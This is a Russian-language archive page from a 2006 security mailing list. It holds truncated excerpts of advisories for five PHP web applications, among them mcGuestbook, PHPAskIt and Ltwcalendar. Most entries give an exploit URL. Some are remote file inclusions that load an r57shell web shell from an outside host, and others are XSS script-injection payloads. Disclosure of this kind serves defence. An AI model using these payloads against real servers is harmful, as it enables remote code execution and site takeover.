Отправляет email-рассылки с помощью сервиса Sendsay

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в mcGuestbook.

Компьютер для продвинутых пользователей В этом выпуске: mcGuestbook ПО: mcGuestbook Версия: 1.3 Уязвимость: Возможность дистанционного выполнения удаленного кода с вашего вэб-сервера. Использование: http://www.example.com/path/admin.php?lang=http://yoursite/r57shell.txt? http://www.example.com/path/ecrire.php?lang=http://yoursite/r57shell.txt? http://www.example.com/path/lire.php?lang=http://yoursite/r57shell.txt? Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной ...

2006-06-25 17:05:07 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в PhpMyFactures.

Компьютер для продвинутых пользователей В этом выпуске: PhpMyFactures ПО: PhpMyFactures Версия: 1.0 Использование: [Guest] http://]/inc/header.php?prefixe_dossier[XSS] [Admin] http://]/remises/ajouter_remise.php?msg[XSS] [Admin] http://]/remises/ajouter_remise.php?tire[XSS] [Admin] http://]/tva/ajouter_tva.php?msg[XSS] [Admin] http://]/stocks/ajouter.php?id_produit=1...

2006-06-25 15:05:10 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в PHPAskIt.

Компьютер для продвинутых пользователей В этом выпуске: PHPAskIt ПО: PHPAskIt Версия: 2.0.1 Уязвимость: Уязвимость позволяет выполнить код на сервере. Использование: http://www.site.com/[phpaskit_path]/import/convertaa.php?qadir[evil_scripts] http://www.site.com/[phpaskit_path]/import/convertwakqa.php?dir[evil_scripts] Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно найти: ICQ - 273214003 e-mail - isdmi1:mail.ru ...

2006-06-25 12:05:08 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в 35mmslidegallery.

Компьютер для продвинутых пользователей В этом выпуске: 35mmslidegallery ПО: 35mmslidegallery Версия: 6 Уязвимость: В данном приложении некоторые переменные не проверяются до выполнения. Это позволяет нам вставить любой JavaScript-код и провести XSS-атаку. Использование: http://example.com/lumet/album/index.php?imgdir><script>alert'10)</script> http://example.comr/lumet/album/popup.php?w><script>alert'10)</script> http://example.com/lumet/album/popup.php?h><script>alert'10)</script> http:...

2006-06-25 10:05:16 + Комментировать

Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Ltwcalendar.

Компьютер для продвинутых пользователей В этом выпуске: Ltwcalendar ПО: Ltwcalendar Версия: 4.1.3 Уязвимость: Уязвимость заключается в возможности выполнять произвольный код на сервере. Код: require_once./private/ltw_config.php); require_once$ltw_config'include_dir'/ltw_classes.php); Использование: http://www.victim.com/Ltwcalendar/calendar.php?ltw_config[include_dir=Command-Shell Не забудьте проголосовать за выпуск! Рассылка создана и ведется при поддержке Информационной сети Пермского края . Меня можно н...

2006-06-25 07:05:39 + Комментировать